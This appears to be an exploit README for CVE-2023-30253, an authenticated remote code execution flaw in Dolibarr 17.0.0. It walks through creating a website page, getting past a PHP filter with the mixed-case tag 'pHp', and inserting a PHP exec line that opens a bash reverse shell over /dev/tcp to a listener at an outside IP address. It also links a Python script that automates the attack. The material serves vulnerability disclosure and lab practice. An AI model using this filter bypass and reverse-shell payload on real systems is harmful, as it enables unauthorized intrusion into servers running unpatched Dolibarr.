Share
## https://sploitus.com/exploit?id=9CFB491D-4D92-57AD-8622-9923D95D15DF
# Readme.md

## **CVE-2023-30253**

CVE-2023-30253 is a security flaw in Dolibarr software that enables authenticated users to execute remote code by utilizing an uppercase manipulation technique in injected data.

## Impact

This vulnerability can lead to unauthorized remote code execution by malicious actors, posing a severe threat to the security and integrity of the affected systems.
The vulnerability has been fixed in Dolibarr 17.0.1.

## Reference

[https://www.swascan.com/security-advisory-dolibarr-17-0-0/](https://www.swascan.com/security-advisory-dolibarr-17-0-0/)

[https://github.com/Dolibarr/dolibarr](https://github.com/Dolibarr/dolibarr)

---

## **Proof of Concept**

Following POC shows how to get Reverse Shell manually.

![Untitled.png](images/Untitled.png)

After login as test user, we can create/modify website.

![Untitled (1).png](images/Untitled_(1).png)

First create a website, and then create a page.

![Untitled (2).png](images/Untitled_(2).png)

![Untitled](images/Untitled%201.png)

After creating website and page, click on binoculars icon, this will open our created page in new tab.

Now click on Edit HTML Source.

![Untitled (4).png](images/Untitled_(4).png)

Here we can try adding php code, but there is some kind of filter preventing us to write a php code.
This can be easily bypassed by changing the format of word php.

![Untitled (5).png](images/Untitled_(5).png)

After changing format of word php to pHp, we can see it is successfully saved.

![Untitled (6).png](images/Untitled_(6).png)

Going to the page, we can see our inserted php code is working.

Now to get reverse shell, lets set up netcat listener

![Untitled (7).png](images/Untitled_(7).png)

![Untitled (8).png](images/Untitled_(8).png)

Then add our reverse shell code `<?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>`

Now opening the website, gives us reverse shell

![Untitled (9).png](images/Untitled_(9).png)

---

---

---

We can use the python code to make it easier

![Untitled](images/Untitled%202.png)

Setup netcat listener.

![Untitled](images/Untitled%203.png)

Run the script and we should have a revershell.

![Untitled](images/Untitled%204.png)
Author of the script:ย [https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)